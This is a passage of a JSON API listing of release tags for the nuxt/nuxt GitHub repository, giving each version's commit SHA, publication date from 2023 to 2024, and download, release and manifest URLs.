ags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.